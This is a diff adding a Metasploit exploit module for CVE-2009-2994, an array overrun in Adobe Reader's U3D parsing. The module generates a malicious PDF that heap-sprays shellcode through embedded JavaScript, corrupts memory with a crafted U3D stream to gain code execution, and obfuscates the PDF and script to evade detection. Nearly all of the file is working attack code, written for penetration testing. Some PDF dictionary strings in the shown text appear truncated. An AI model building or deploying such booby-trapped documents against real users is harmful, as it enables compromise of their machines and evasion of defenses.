diff --git a/modules/exploits/windows/fileformat/adobe_u3d_meshdecl.rb b/modules/exploits/windows/fileformat/adobe_u3d_meshdecl.rb new file mode 100644 index 0000000000..5bbebead17 --- /dev/null +++ b/modules/exploits/windows/fileformat/adobe_u3d_meshdecl.rb @@ -0,0 +1,417 @@ +### +## This file is part of the Metasploit Framework and may be subject to +## redistribution and commercial restrictions. Please see the Metasploit +## Framework web site for more information on licensing and terms of use. +## http://metasploit.com/framework/ +### + +require 'msf/core' +require 'zlib' + +class Metasploit3 < Msf::Exploit::Remote + + include Msf::Exploit::FILEFORMAT + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Adobe U3D CLODProgressiveMeshDeclaration Array Overrun', + 'Description' => %q{ + This module exploits an array overflow in Adobe Reader and Adobe Acrobat. + Affected versions include < 7.1.4, < 8.1.7, and < 9.2. By creating a + specially crafted pdf that a contains malformed U3D data, an attacker may + be able to execute arbitrary code. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Felipe Andres Manzano ', + 'jduck' + ], + 'Version' => '$Revision$', + 'References' => + [ + [ 'CVE', '2009-2994' ], + [ 'OSVDB', '58912' ], + [ 'BID', '36689' ], + [ 'URL', 'http://sites.google.com/site/felipeandresmanzano/' ], + [ 'URL', 'http://www.adobe.com/support/security/bulletins/apsb09-15.html' ] + ], + 'DefaultOptions' => + { + 'EXITFUNC' => 'process', + }, + 'Payload' => + { + 'Space' => 1024, + 'BadChars' => "\x00", + 'DisableNops' => true + }, + 'Platform' => 'win', + 'Targets' => + [ + # test results (on Windows XP SP3) + # reader 7.0.5 - untested + # reader 7.0.8 - untested + # reader 7.0.9 - untested + # reader 7.1.0 - untested + # reader 7.1.1 - untested + # reader 8.0.0 - untested + # reader 8.1.2 - untested + # reader 8.1.3 - untested + # reader 9.0.0 - untested + # reader 9.1.0 - works + [ 'Adobe Reader Windows Universal (JS Heap Spray)', + { + 'Size' => (6500/20), + 'DataAddr' => 0x09011020, + 'WriteAddr' => 0x7c49fb34, + } + ], + ], + 'DisclosureDate' => 'Oct 13 2009', + 'DefaultTarget' => 0)) + + register_options( + [ + OptString.new('FILENAME', [ true, 'The file name.', 'msf.pdf']), + ], self.class) + + end + + + + def exploit + # Encode the shellcode. + shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch)) + + # Make some nops + nops = Rex::Text.to_unescape(make_nops(4)) + +=begin + +Original notes on heap technique used in this exploit: + +## PREPAREHOLES: +## We will construct 6500*20 bytes long chunks starting like this +## |0 |6 |8 |C |24 |size +## |00000... |0100|20100190|0000... | ......pad...... | +## \ \ +## \ \ -Pointer: to controlled data +## \ -Flag: must be 1 +## -Adobe will handle this ragged structure if the Flag is on. +## -Adobe will get 'what to write where' from the memory pointed +## by our supplied Pointer. +## +## then allocate a bunch of those .. +## .. | chunk | chunk | chunk | chunck | chunk | chunck | chunck | .. +## |XXXXXXX|XXXXXXX|XXXXXXX|XXXXXXXX|XXXXXXX|XXXXXXXX|XXXXXXXX| +## +## and then free some of them... +## .. | chunk | free | chunk | free | chunk | free | chunck | .. +## |XXXXXXX| |XXXXXXX| |XXXXXXX| |XXXXXXXX| +## +## This way controlling when the next 6500*20 malloc will be +## followed with. We freed more than one hole so it became tolerant +## to some degree of malloc/free trace noise. +## Note the 6500 is arbitrary it should be a fairly unused chunk size +## not big enough to cause a different type of allocation. +## Also as we don't need to reference it from anywhere we don't care +## where this hole layout is placed in memory. + +## PREPAREMEMORY: +## In the next technique we make a big-chunk of 0x10000 bytes +## repeating a 0x1000 bytes long mini-chunk of controled data. +## Big-chunks are always allocated aligned to 0x1000. And if we +## allocate a fair amount of big-chuncks (XPSPx) we'll be confident +## Any 0x1000 aligned 0x1000 bytes from 0x09000000 to 0x0a000000 +## will have our mini chunk +## +## A mini-chunk will have this look +## +## |0 |10 |54 |? |0xff0 |0x1000 +## |00000... | POINTERS | nops | shellcode | pad | +## +## So we control what is in 0x09XXXXXX. shellcode will be at 0x09XXX054+ +## But we use 0x09011064. +## POINTERS looks like this: +## ... + +=end + + # prepare the hole + daddr = target['DataAddr'] + hole_data = [0,0,1,daddr].pack('VvvV') + #padding + hole_data << "\x00" * 24 + hole = Rex::Text.to_unescape(hole_data) + + # prepare ptrs + ptrs_data = [0].pack('V') + #where to write + ptrs_data << [target['WriteAddr'] / 4].pack('V') + #must be greater tan 5 and less than x for getting us where we want + ptrs_data << [6].pack('V') + #what to write + ptrs_data << [(daddr+0x10)].pack('V') + #autopointer for print magic(tm) + ptrs_data << [(daddr+0x14)].pack('V') + #function pointers for print magic(tm) + #pointing to our shellcode + ptrs_data << [(daddr+0x44)].pack('V') * 12 + ptrs = Rex::Text.to_unescape(ptrs_data) + + js_doc = %Q| + function prepareHoles(slide_size) + { + var size = 1000; + var xarr = new Array(size); + var hole = unescape("#{hole}"); + var pad = unescape("%u5858"); + while (pad.length <= slide_size/2 - hole.length) + pad += pad; + for (loop1=0; loop1 < size; loop1+=1) + { + ident = ""+loop1; + xarr[loop1]=hole + pad.substring(0,slide_size/2-hole.length); + } + for (loop2=0;loop2<100;loop2++) + { + for (loop1=size/2; loop1 < size-2; loop1+=2) + { + xarr[loop1]=null; + xarr[loop1]=pad.substring(0,0x10000/2 )+"A"; + xarr[loop1]=null; + } + } + return xarr; + } + + function prepareMemory(size) + { + var mini_slide_size = 0x1000; + var slide_size = 0x100000; + var xarr = new Array(size); + var pad = unescape("%ucccc"); + + while (pad.length <= 32 ) + pad += pad; + + var nops = unescape("#{nops}"); + while (nops.length <= mini_slide_size/2 - nops.length) + nops += nops; + + var shellcode = unescape("#{shellcode}"); + var pointers = unescape("#{ptrs}"); + var chunk = nops.substring(0,32/2) + pointers + + nops.substring(0,mini_slide_size/2-pointers.length - shellcode.length - 32) + + shellcode + pad.substring(0,32/2); + chunk=chunk.substring(0,mini_slide_size/2); + while (chunk.length <= slide_size/2) + chunk += chunk; + + for (loop1=0; loop1 < size; loop1+=1) + { + ident = ""+loop1; + xarr[loop1]=chunk.substring(16,slide_size/2 -32-ident.length)+ident; + } + return xarr; + } + + var mem = prepareMemory(200); + var holes = prepareHoles(6500); +| + js_pg1 = %Q|this.print((bUI:true, bSilent:false, bShrinkToFit:false));| + + # Obfuscate it up a bit + js_doc = obfuscate_js(js_doc, + 'Symbols' => { + 'Variables' => %W{ slide_size size hole pad mini_slide_size nops shellcode pointers chunk mem holes xarr loop1 loop2 ident }, + 'Methods' => %W{ prepareMemory prepareHoles } + }).to_s + + # create the u3d stuff + u3d = make_u3d_stream(target['Size']) + + # Create the pdf + pdf = make_pdf(u3d, js_doc, js_pg1) + + print_status("Creating '#{datastore['FILENAME']}' file...") + + file_create(pdf) + end + + + def obfuscate_js(javascript, opts) + js = Rex::Exploitation::ObfuscateJS.new(javascript, opts) + js.obfuscate + return js + end + + + def RandomNonASCIIString(count) + result = "" + count.times do + result << (rand(128) + 128).chr + end + result + end + + def ioDef(id) + "%d 0 obj\n" % id + end + + def ioRef(id) + "%d 0 R" % id + end + + #http://blog.didierstevens.com/2008/04/29/pdf-let-me-count-the-ways/ + def nObfu(str) + + result = "" + str.scan(/./u) do |c| + if rand(2) == 0 and c.upcase >= 'A' and c.upcase <= 'Z' + result << "#%x" % c.unpack("C*")[0] + else + result << c + end + end + result + end + + def ASCIIHexWhitespaceEncode(str) + result = "" + whitespace = "" + str.each_byte do |b| + result << whitespace << "%02x" % b + whitespace = " " * (rand(3) + 1) + end + result << ">" + end + + def make_u3d_stream(size) + + data = "" + data << "55334400180000000000000000010000000000002400000064010000000000006a00000014" + data << "ffffffe40000000000000007005468654d65736801000000000000005050500100000031ff" + data << "ffff710000004b00000007005468654d657368000000000000000001000000595858580400" + data << "0000000000000000000000000000010000000000000000000000000000005b5858585c5858" + data << "582c0100002c0100002c010000000000000000000000000000000000000000000000000000" + data << "000000000000000000000000505050010000000600617574686f7201000000370000004665" + data << "6c69706520416e64726573204d616e7a616e6f203c66656c6970652e616e647265732e6d61" + data << "6e7a616e6f40676d61696c2e636f6d3e503cffffff410000000000000007005468654d6573" + data << "68000000000000000000000000000000000100000001000000010000000100000001000000" + data << "0100000001000000010000000100000001000000505050" + + data = [data].pack('H*') + + # 9.6.1.1.3.3 U32: Position Count + addr = [0x58585859].pack('V') + data[data.index(addr),4] = [size].pack('V') + # minimalResolution + addr = [0x5858585b].pack('V') + data[data.index(addr),4] = [size+2].pack('V') + # finalMaximumResolution, this just need to be bigger than the last one. + addr = [0x5858585c].pack('V') + data[data.index(addr),4] = [size+3].pack('V') + + return data + + end + + def make_pdf(u3d_stream, js_doc, js_pg1) + + xref = [] + eol = "\x0a" + obj_end = "" << eol << "endobj" << eol + + # the header + pdf = "%PDF-1.7" << eol + + # filename/comment + pdf << "%" << RandomNonASCIIString(4) << eol + + # js stream + xref << pdf.length + compressed = Zlib::Deflate.deflate(ASCIIHexWhitespaceEncode(js_doc)) + pdf << ioDef(1) << nObfu("<>" % compressed.length) << eol + pdf << "stream" << eol + pdf << compressed << eol + pdf << "endstream" << eol + pdf << obj_end + + # catalog + xref << pdf.length + pdf << ioDef(3) << nObfu("<>") + pdf << obj_end + + # outline + xref << pdf.length + pdf << ioDef(4) << nObfu("<>") + pdf << obj_end + + # kids + xref << pdf.length + pdf << ioDef(5) << nObfu("<>") + pdf << obj_end + + # u3d stream + xref << pdf.length + pdf << ioDef(6) << nObfu("<>" % u3d_stream.length) << eol + pdf << "stream" << eol + pdf << u3d_stream << eol + pdf << "endstream" + pdf << obj_end + + # u3d annotation object + xref << pdf.length + pdf << ioDef(7) << nObfu("<>" + pdf << nObfu("/Rect [0 0 640 480]/3DD ") << ioRef(6) << nObfu("/F 7>>") + pdf << obj_end + + # page 0 (u3d/print) + xref << pdf.length + pdf << ioDef(8) << nObfu("<>") + pdf << nObfu(">>") + pdf << obj_end + + # js dict + xref << pdf.length + pdf << ioDef(9) << nObfu("<>" << obj_end + + # js dict + xref << pdf.length + pdf << ioDef(10) << nObfu("<>" << obj_end + + # js stream 2 + xref << pdf.length + compressed = Zlib::Deflate.deflate(ASCIIHexWhitespaceEncode(js_pg1)) + pdf << ioDef(11) << nObfu("<>" % compressed.length) << eol + pdf << "stream" << eol + pdf << compressed << eol + pdf << "endstream" << eol + pdf << obj_end + + # xrefs + xrefPosition = pdf.length + pdf << "xref" << eol + pdf << "0 %d" % (xref.length + 1) << eol + pdf << "0000000000 65535 f" << eol + xref.each do |index| + pdf << "%010d 00000 n" % index << eol + end + + # trailer + pdf << "trailer" << eol + pdf << nObfu("<>" << eol + pdf << "startxref" << eol + pdf << xrefPosition.to_s() << eol + pdf << "%%EOF" << eol + + end + +end